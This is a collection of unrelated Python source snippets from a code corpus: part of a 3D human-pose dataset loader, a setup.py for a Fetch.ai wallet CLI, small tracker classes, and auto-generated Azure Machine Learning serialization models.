if dconf['hflip'] == 1:
imgt.horizontal_flip()
imgt.resize(self.dataconf.crop_resolution)
imgt.normalize_affinemap()
frames[i, :, :, :] = normalize_channels(imgt.asarray(),
channel_power=dconf['chpower'])
pose[i, :, 0:2] = transform_2d_points(imgt.afmat,
pose_uvd[i, :,0:2], transpose=True)
pose[i, :, 2] = \
(pose_uvd[i, :, 2] - zrange[0]) / (zrange[1] - zrange[0])
if imgt.hflip:
pose[i, :, :] = pose[i, self.poselayout.map_hflip, :]
"""Set outsider body joints to invalid (-1e9)."""
pose = np.reshape(pose, (-1, self.poselayout.dim))
pose[np.isnan(pose)] = -1e9
v = np.expand_dims(get_visible_joints(pose[:,0:2]), axis=-1)
pose[(v==0)[:,0],:] = -1e9
pose = np.reshape(pose, (len(objframes), self.poselayout.num_joints,
self.poselayout.dim))
v = np.reshape(v, (len(objframes), self.poselayout.num_joints, 1))
pose = np.concatenate((pose, v), axis=-1)
if self.topology != 'sequences':
pose_w = np.squeeze(pose_w, axis=0)
pose_uvd = np.squeeze(pose_uvd, axis=0)
pose = np.squeeze(pose, axis=0)
frames = np.squeeze(frames, axis=0)
output['camera'] = cam.serialize()
output['action'] = int(seq.name[1:3]) - 1
output['pose_w'] = pose_w
output['pose_uvd'] = pose_uvd
output['pose'] = pose
output['frame'] = frames
"""Take the last transformation matrix, it should not change"""
output['afmat'] = imgt.afmat.copy()
return output
def load_pose_annot(self, frames):
p = np.empty((len(frames), self.poselayout.num_joints,
self.poselayout.dim))
for i in range(len(frames)):
p[i,:] = frames[i].pose3d.T[self.poselayout.map_from_h36m,
0:self.poselayout.dim].copy()
return p
def clip_length(self):
if self.topology == 'sequences':
return self.clip_size
else:
return None
def clip_shape(self):
if self.topology == 'sequences':
return (self.clip_size,)
else:
return ()
def get_shape(self, dictkey):
if dictkey == 'frame':
return self.clip_shape() + self.dataconf.input_shape
if dictkey == 'pose':
return self.clip_shape() \
+ (self.poselayout.num_joints, self.poselayout.dim+1)
if dictkey == 'pose_w':
return self.clip_shape() \
+ (self.poselayout.num_joints, self.poselayout.dim)
if dictkey == 'pose_uvd':
return self.clip_shape() \
+ (self.poselayout.num_joints, self.poselayout.dim)
if dictkey == 'action':
return (1,)
if dictkey == 'camera':
return (21,)
if dictkey == 'afmat':
return (3, 3)
raise Exception('Invalid dictkey on get_shape!')
def get_length(self, mode):
if self.topology == 'sequences':
return len(self.sequences[mode])
else:
return len(self.frame_idx[mode])
| StarcoderdataPython |
1839748 | <gh_stars>0
from setuptools import setup, find_packages
from pocketbook import __version__
setup(
name='pocketbook',
version=__version__,
description='Command line wallet application for the Fetch.ai network',
url='https://github.com/fetchai/tools-pocketbook',
author='<NAME>',
author_email='<EMAIL>',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=[
'fetchai-ledger-api==1.0.0rc1',
'toml',
'colored',
],
extras_require={
'dev': ['check-manifest'],
'test': ['coverage', 'pytest'],
},
entry_points={
'console_scripts': [
'pocketbook=pocketbook.cli:main'
],
},
)
| StarcoderdataPython |
6604755 | from scraper import *
s = Scraper(start=231660, end=233441, max_iter=30, scraper_instance=130)
s.scrape_letterboxd() | StarcoderdataPython |
3347908 | from __future__ import absolute_import
from . import Tracker
class IdentityTracker(Tracker):
def __init__(self):
super(IdentityTracker, self).__init__(
name='IdentityTracker',
is_deterministic=True)
def init(self, image, box):
self.box = box
def update(self, image):
return self.box
class IdentityTrackerRGBD(Tracker):
def __init__(self):
super(IdentityTrackerRGBD, self).__init__(
name='IdentityTrackerRGBD',
is_deterministic=True)
def init(self, image, box, depth):
self.box = box
def update(self, image, depth):
return self.box | StarcoderdataPython |
12855560 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AssetJobInput(msrest.serialization.Model):
"""Asset input type.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
"""
super(AssetJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
class AssetJobOutput(msrest.serialization.Model):
"""Asset output type.
:ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:ivar uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:vartype uri: str
"""
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:keyword uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:paramtype uri: str
"""
super(AssetJobOutput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs.get('uri', None)
class BatchJob(msrest.serialization.Model):
"""Batch endpoint job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar compute: Compute configuration used to set instance count.
:vartype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
:ivar dataset: Input dataset
This will be deprecated. Use InputData instead.
:vartype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
:ivar description: The asset description text.
:vartype description: str
:ivar error_threshold: Error threshold, if the error count for the entire input goes above this
value,
the batch inference will be aborted. Range is [-1, int.MaxValue]
-1 value indicates, ignore all failures during batch inference.
:vartype error_threshold: int
:ivar input_data: Input data for the job.
:vartype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
:ivar interaction_endpoints: Dictonary of endpoint URIs, keyed by enumerated job endpoints.
:vartype interaction_endpoints: dict[str,
~azure.mgmt.machinelearningservices.models.JobEndpoint]
:ivar logging_level: Logging level for batch inference operation. Possible values include:
"Info", "Warning", "Debug".
:vartype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
:ivar max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
:vartype max_concurrency_per_instance: int
:ivar mini_batch_size: Size of the mini-batch passed to each batch invocation.
For FileDataset, this is the number of files per mini-batch.
For TabularDataset, this is the size of the records in bytes, per mini-batch.
:vartype mini_batch_size: long
:ivar name:
:vartype name: str
:ivar output: Location of the job output logs and artifacts.
:vartype output: ~azure.mgmt.machinelearningservices.models.JobOutputArtifacts
:ivar output_data: Job output data location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
:vartype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
:ivar output_dataset: Output dataset location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
This will be deprecated. Use OutputData instead.
:vartype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
:ivar output_file_name: Output file name.
:vartype output_file_name: str
:ivar partition_keys: Partition keys list used for Named partitioning.
:vartype partition_keys: list[str]
:ivar properties: The asset property dictionary.
:vartype properties: dict[str, str]
:ivar provisioning_state: Possible values include: "Succeeded", "Failed", "Canceled",
"InProgress".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.JobProvisioningState
:ivar retry_settings: Retry Settings for the batch inference operation.
:vartype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
:ivar status: Status of the job. Possible values include: "NotStarted", "Starting",
"Provisioning", "Preparing", "Queued", "Running", "Finalizing", "CancelRequested", "Completed",
"Failed", "Canceled", "NotResponding", "Paused", "Unknown".
:vartype status: str or ~azure.mgmt.machinelearningservices.models.JobStatus
:ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:vartype tags: dict[str, str]
"""
_validation = {
'interaction_endpoints': {'readonly': True},
'output': {'readonly': True},
'provisioning_state': {'readonly': True},
'status': {'readonly': True},
}
_attribute_map = {
'compute': {'key': 'compute', 'type': 'ComputeConfiguration'},
'dataset': {'key': 'dataset', 'type': 'InferenceDataInputBase'},
'description': {'key': 'description', 'type': 'str'},
'error_threshold': {'key': 'errorThreshold', 'type': 'int'},
'input_data': {'key': 'inputData', 'type': '{JobInput}'},
'interaction_endpoints': {'key': 'interactionEndpoints', 'type': '{JobEndpoint}'},
'logging_level': {'key': 'loggingLevel', 'type': 'str'},
'max_concurrency_per_instance': {'key': 'maxConcurrencyPerInstance', 'type': 'int'},
'mini_batch_size': {'key': 'miniBatchSize', 'type': 'long'},
'name': {'key': 'name', 'type': 'str'},
'output': {'key': 'output', 'type': 'JobOutputArtifacts'},
'output_data': {'key': 'outputData', 'type': '{JobOutputV2}'},
'output_dataset': {'key': 'outputDataset', 'type': 'DataVersion'},
'output_file_name': {'key': 'outputFileName', 'type': 'str'},
'partition_keys': {'key': 'partitionKeys', 'type': '[str]'},
'properties': {'key': 'properties', 'type': '{str}'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'retry_settings': {'key': 'retrySettings', 'type': 'BatchRetrySettings'},
'status': {'key': 'status', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword compute: Compute configuration used to set instance count.
:paramtype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
:keyword dataset: Input dataset
This will be deprecated. Use InputData instead.
:paramtype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
:keyword description: The asset description text.
:paramtype description: str
:keyword error_threshold: Error threshold, if the error count for the entire input goes above
this value,
the batch inference will be aborted. Range is [-1, int.MaxValue]
-1 value indicates, ignore all failures during batch inference.
:paramtype error_threshold: int
:keyword input_data: Input data for the job.
:paramtype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
:keyword logging_level: Logging level for batch inference operation. Possible values include:
"Info", "Warning", "Debug".
:paramtype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
:keyword max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
:paramtype max_concurrency_per_instance: int
:keyword mini_batch_size: Size of the mini-batch passed to each batch invocation.
For FileDataset, this is the number of files per mini-batch.
For TabularDataset, this is the size of the records in bytes, per mini-batch.
:paramtype mini_batch_size: long
:keyword name:
:paramtype name: str
:keyword output_data: Job output data location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
:paramtype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
:keyword output_dataset: Output dataset location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
This will be deprecated. Use OutputData instead.
:paramtype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
:keyword output_file_name: Output file name.
:paramtype output_file_name: str
:keyword partition_keys: Partition keys list used for Named partitioning.
:paramtype partition_keys: list[str]
:keyword properties: The asset property dictionary.
:paramtype properties: dict[str, str]
:keyword retry_settings: Retry Settings for the batch inference operation.
:paramtype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
:keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:paramtype tags: dict[str, str]
"""
super(BatchJob, self).__init__(**kwargs)
self.compute = kwargs.get('compute', None)
self.dataset = kwargs.get('dataset', None)
self.description = kwargs.get('description', None)
self.error_threshold = kwargs.get('error_threshold', None)
self.input_data = kwargs.get('input_data', None)
self.interaction_endpoints = None
self.logging_level = kwargs.get('logging_level', None)
self.max_concurrency_per_instance = kwargs.get('max_concurrency_per_instance', None)
self.mini_batch_size = kwargs.get('mini_batch_size', None)
self.name = kwargs.get('name', None)
self.output = None
self.output_data = kwargs.get('output_data', None)
self.output_dataset = kwargs.get('output_dataset', None)
self.output_file_name = kwargs.get('output_file_name', None)
self.partition_keys = kwargs.get('partition_keys', None)
self.properties = kwargs.get('properties', None)
self.provisioning_state = None
self.retry_settings = kwargs.get('retry_settings', None)
self.status = None
self.tags = kwargs.get('tags', None)
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
"""
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class BatchJobResource(Resource):
"""Azure Resource Manager resource envelope.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar properties: Required. [Required] Additional attributes of the entity.
:vartype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
:ivar system_data: System data associated with resource provider.
:vartype system_data: ~azure.mgmt.machinelearningservices.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'properties': {'required': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'BatchJob'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
"""
:keyword properties: Required. [Required] Additional attributes of the entity.
:paramtype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
"""
super(BatchJobResource, self).__init__(**kwargs)
self.properties = kwargs['properties']
self.system_data = None
class BatchJobResourceArmPaginatedResult(msrest.serialization.Model):
"""A paginated list of BatchJob entities.
:ivar next_link: The link to the next page of BatchJob objects. If null, there are no
additional pages.
:vartype next_link: str
:ivar value: An array of objects of type BatchJob.
:vartype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'value': {'key': 'value', 'type': '[BatchJobResource]'},
}
def __init__(
self,
**kwargs
):
"""
:keyword next_link: The link to the next page of BatchJob objects. If null, there are no
additional pages.
:paramtype next_link: str
:keyword value: An array of objects of type BatchJob.
:paramtype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
"""
super(BatchJobResourceArmPaginatedResult, self).__init__(**kwargs)
self.next_link = kwargs.get('next_link', None)
self.value = kwargs.get('value', None)
class BatchRetrySettings(msrest.serialization.Model):
"""Retry settings for a batch inference operation.
:ivar max_retries: Maximum retry count for a mini-batch.
:vartype max_retries: int
:ivar timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
:vartype timeout: ~datetime.timedelta
"""
_attribute_map = {
'max_retries': {'key': 'maxRetries', 'type': 'int'},
'timeout': {'key': 'timeout', 'type': 'duration'},
}
def __init__(
self,
**kwargs
):
"""
:keyword max_retries: Maximum retry count for a mini-batch.
:paramtype max_retries: int
:keyword timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
:paramtype timeout: ~datetime.timedelta
"""
super(BatchRetrySettings, self).__init__(**kwargs)
self.max_retries = kwargs.get('max_retries', None)
self.timeout = kwargs.get('timeout', None)
class ComputeConfiguration(msrest.serialization.Model):
"""Configuration for compute binding.
:ivar instance_count: Number of instances or nodes.
:vartype instance_count: int
:ivar instance_type: SKU type to run on.
:vartype instance_type: str
:ivar is_local: Set to true for jobs running on local compute.
:vartype is_local: bool
:ivar location: Location for virtual cluster run.
:vartype location: str
:ivar properties: Additional properties.
:vartype properties: dict[str, str]
:ivar target: ARM resource ID of the Compute you are targeting. If not provided the resource
will be deployed as Managed.
:vartype target: str
"""
_attribute_map = {
'instance_count': {'key': 'instanceCount', 'type': 'int'},
'instance_type': {'key': 'instanceType', 'type': 'str'},
'is_local': {'key': 'isLocal', 'type': 'bool'},
'location': {'key': 'location', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{str}'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword instance_count: Number of instances or nodes.
:paramtype instance_count: int
:keyword instance_type: SKU type to run on.
:paramtype instance_type: str
:keyword is_local: Set to true for jobs running on local compute.
:paramtype is_local: bool
:keyword location: Location for virtual cluster run.
:paramtype location: str
:keyword properties: Additional properties.
:paramtype properties: dict[str, str]
:keyword target: ARM resource ID of the Compute you are targeting. If not provided the resource
will be deployed as Managed.
:paramtype target: str
"""
super(ComputeConfiguration, self).__init__(**kwargs)
self.instance_count = kwargs.get('instance_count', None)
self.instance_type = kwargs.get('instance_type', None)
self.is_local = kwargs.get('is_local', None)
self.location = kwargs.get('location', None)
self.properties = kwargs.get('properties', None)
self.target = kwargs.get('target', None)
class DataVersion(msrest.serialization.Model):
"""Data asset version details.
All required parameters must be populated in order to send to Azure.
:ivar dataset_type: The Format of dataset. Possible values include: "Simple", "Dataflow".
:vartype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
:ivar datastore_id: ARM resource ID of the datastore where the asset is located.
:vartype datastore_id: str
:ivar description: The asset description text.
:vartype description: str
:ivar is_anonymous: If the name version are system generated (anonymous registration).
:vartype is_anonymous: bool
:ivar path: Required. [Required] The path of the file/directory in the datastore.
:vartype path: str
:ivar properties: The asset property dictionary.
:vartype properties: dict[str, str]
:ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:vartype tags: dict[str, str]
"""
_validation = {
'path': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
}
_attribute_map = {
'dataset_type': {'key': 'datasetType', 'type': 'str'},
'datastore_id': {'key': 'datastoreId', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'is_anonymous': {'key': 'isAnonymous', 'type': 'bool'},
'path': {'key': 'path', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{str}'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword dataset_type: The Format of dataset. Possible values include: "Simple", "Dataflow".
:paramtype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
:keyword datastore_id: ARM resource ID of the datastore where the asset is located.
:paramtype datastore_id: str
:keyword description: The asset description text.
:paramtype description: str
:keyword is_anonymous: If the name version are system generated (anonymous registration).
:paramtype is_anonymous: bool
:keyword path: Required. [Required] The path of the file/directory in the datastore.
:paramtype path: str
:keyword properties: The asset property dictionary.
:paramtype properties: dict[str, str]
:keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:paramtype tags: dict[str, str]
"""
super(DataVersion, self).__init__(**kwargs)
self.dataset_type = kwargs.get('dataset_type', None)
self.datastore_id = kwargs.get('datastore_id', None)
self.description = kwargs.get('description', None)
self.is_anonymous = kwargs.get('is_anonymous', None)
self.path = kwargs['path']
self.properties = kwargs.get('properties', None)
self.tags = kwargs.get('tags', None)
class ErrorDetail(msrest.serialization.Model):
"""Error detail information.
All required parameters must be populated in order to send to Azure.
:ivar code: Required. Error code.
:vartype code: str
:ivar message: Required. Error message.
:vartype message: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword code: Required. Error code.
:paramtype code: str
:keyword message: Required. Error message.
:paramtype message: str
"""
super(ErrorDetail, self).__init__(**kwargs)
self.code = kwargs['code']
self.message = kwargs['message']
class ErrorResponse(msrest.serialization.Model):
"""Error response information.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: Error code.
:vartype code: str
:ivar message: Error message.
:vartype message: str
:ivar details: An array of error detail objects.
:vartype details: list[~azure.mgmt.machinelearningservices.models.ErrorDetail]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
}
def __init__(
self,
**kwargs
):
"""
"""
super(ErrorResponse, self).__init__(**kwargs)
self.code = None
self.message = None
self.details = None
class InferenceDataInputBase(msrest.serialization.Model):
"""InferenceDataInputBase.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: InferenceDataUrlInput, InferenceDatasetIdInput, InferenceDatasetInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
"""
_validation = {
'data_input_type': {'required': True},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
}
_subtype_map = {
'data_input_type': {'DataUrl': 'InferenceDataUrlInput', 'DatasetId': 'InferenceDatasetIdInput', 'DatasetVersion': 'InferenceDatasetInput'}
}
def __init__(
self,
**kwargs
):
"""
"""
super(InferenceDataInputBase, self).__init__(**kwargs)
self.data_input_type = None # type: Optional[str]
class InferenceDatasetIdInput(InferenceDataInputBase):
"""InferenceDatasetIdInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
:ivar dataset_id: ARM ID of the input dataset.
:vartype dataset_id: str
"""
_validation = {
'data_input_type': {'required': True},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
'dataset_id': {'key': 'datasetId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword dataset_id: ARM ID of the input dataset.
:paramtype dataset_id: str
"""
super(InferenceDatasetIdInput, self).__init__(**kwargs)
self.data_input_type = 'DatasetId' # type: str
self.dataset_id = kwargs.get('dataset_id', None)
class InferenceDatasetInput(InferenceDataInputBase):
"""InferenceDatasetInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
:ivar dataset_name: Name of the input dataset.
:vartype dataset_name: str
:ivar dataset_version: Version of the input dataset.
:vartype dataset_version: str
"""
_validation = {
'data_input_type': {'required': True},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
'dataset_name': {'key': 'datasetName', 'type': 'str'},
'dataset_version': {'key': 'datasetVersion', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword dataset_name: Name of the input dataset.
:paramtype dataset_name: str
:keyword dataset_version: Version of the input dataset.
:paramtype dataset_version: str
"""
super(InferenceDatasetInput, self).__init__(**kwargs)
self.data_input_type = 'DatasetVersion' # type: str
self.dataset_name = kwargs.get('dataset_name', None)
self.dataset_version = kwargs.get('dataset_version', None)
class InferenceDataUrlInput(InferenceDataInputBase):
"""InferenceDataUrlInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
:ivar path: Required. Asset path to the input data, say a blob URL.
:vartype path: str
"""
_validation = {
'data_input_type': {'required': True},
'path': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
'path': {'key': 'path', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword path: Required. Asset path to the input data, say a blob URL.
:paramtype path: str
"""
super(InferenceDataUrlInput, self).__init__(**kwargs)
self.data_input_type = 'DataUrl' # type: str
self.path = kwargs['path']
class JobEndpoint(msrest.serialization.Model):
"""Job endpoint definition.
:ivar endpoint: Url for endpoint.
:vartype endpoint: str
:ivar job_endpoint_type: Endpoint type.
:vartype job_endpoint_type: str
:ivar port: Port for endpoint.
:vartype port: int
:ivar properties: Additional properties to set on the endpoint.
:vartype properties: dict[str, str]
"""
_attribute_map = {
'endpoint': {'key': 'endpoint', 'type': 'str'},
'job_endpoint_type': {'key': 'jobEndpointType', 'type': 'str'},
'port': {'key': 'port', 'type': 'int'},
'properties': {'key': 'properties', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword endpoint: Url for endpoint.
:paramtype endpoint: str
:keyword job_endpoint_type: Endpoint type.
:paramtype job_endpoint_type: str
:keyword port: Port for endpoint.
:paramtype port: int
:keyword properties: Additional properties to set on the endpoint.
:paramtype properties: dict[str, str]
"""
super(JobEndpoint, self).__init__(**kwargs)
self.endpoint = kwargs.get('endpoint', None)
self.job_endpoint_type = kwargs.get('job_endpoint_type', None)
self.port = kwargs.get('port', None)
self.properties = kwargs.get('properties', None)
class JobInput(msrest.serialization.Model):
"""Job input definition.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: MLTableJobInput, UriFileJobInput, UriFolderJobInput.
All required parameters must be populated in order to send to Azure.
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'job_input_type': {'required': True},
}
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
_subtype_map = {
'job_input_type': {'MLTable': 'MLTableJobInput', 'UriFile': 'UriFileJobInput', 'UriFolder': 'UriFolderJobInput'}
}
def __init__(
self,
**kwargs
):
"""
:keyword description: Description for the input.
:paramtype description: str
"""
super(JobInput, self).__init__(**kwargs)
self.description = kwargs.get('description', None)
self.job_input_type = None # type: Optional[str]
class JobOutputArtifacts(msrest.serialization.Model):
"""Job output definition container information on where to find job logs and artifacts.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar datastore_id: ARM ID of the datastore where the job logs and artifacts are stored.
:vartype datastore_id: str
:ivar path: Path within the datastore to the job logs and artifacts.
:vartype path: str
"""
_validation = {
'datastore_id': {'readonly': True},
'path': {'readonly': True},
}
_attribute_map = {
'datastore_id': {'key': 'datastoreId', 'type': 'str'},
'path': {'key': 'path', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
"""
super(JobOutputArtifacts, self).__init__(**kwargs)
self.datastore_id = None
self.path = None
class JobOutputV2(msrest.serialization.Model):
"""Job output definition container information on where to find the job output.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UriFileJobOutput.
All required parameters must be populated in order to send to Azure.
:ivar description: Description for the output.
:vartype description: str
:ivar job_output_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile".
:vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
"""
_validation = {
'job_output_type': {'required': True},
}
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'job_output_type': {'key': 'jobOutputType', 'type': 'str'},
}
_subtype_map = {
'job_output_type': {'UriFile': 'UriFileJobOutput'}
}
def __init__(
self,
**kwargs
):
"""
:keyword description: Description for the output.
:paramtype description: str
"""
super(JobOutputV2, self).__init__(**kwargs)
self.description = kwargs.get('description', None)
self.job_output_type = None # type: Optional[str]
class LabelClass(msrest.serialization.Model):
"""Label class definition.
:ivar display_name: Display name of the label class.
:vartype display_name: str
:ivar subclasses: Dictionary of subclasses of the label class.
:vartype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'subclasses': {'key': 'subclasses', 'type': '{LabelClass}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword display_name: Display name of the label class.
:paramtype display_name: str
:keyword subclasses: Dictionary of subclasses of the label class.
:paramtype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
"""
super(LabelClass, self).__init__(**kwargs)
self.display_name = kwargs.get('display_name', None)
self.subclasses = kwargs.get('subclasses', None)
class MLTableJobInput(JobInput, AssetJobInput):
"""MLTableJobInput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
:ivar description: Description for the input.
:vartype description: str
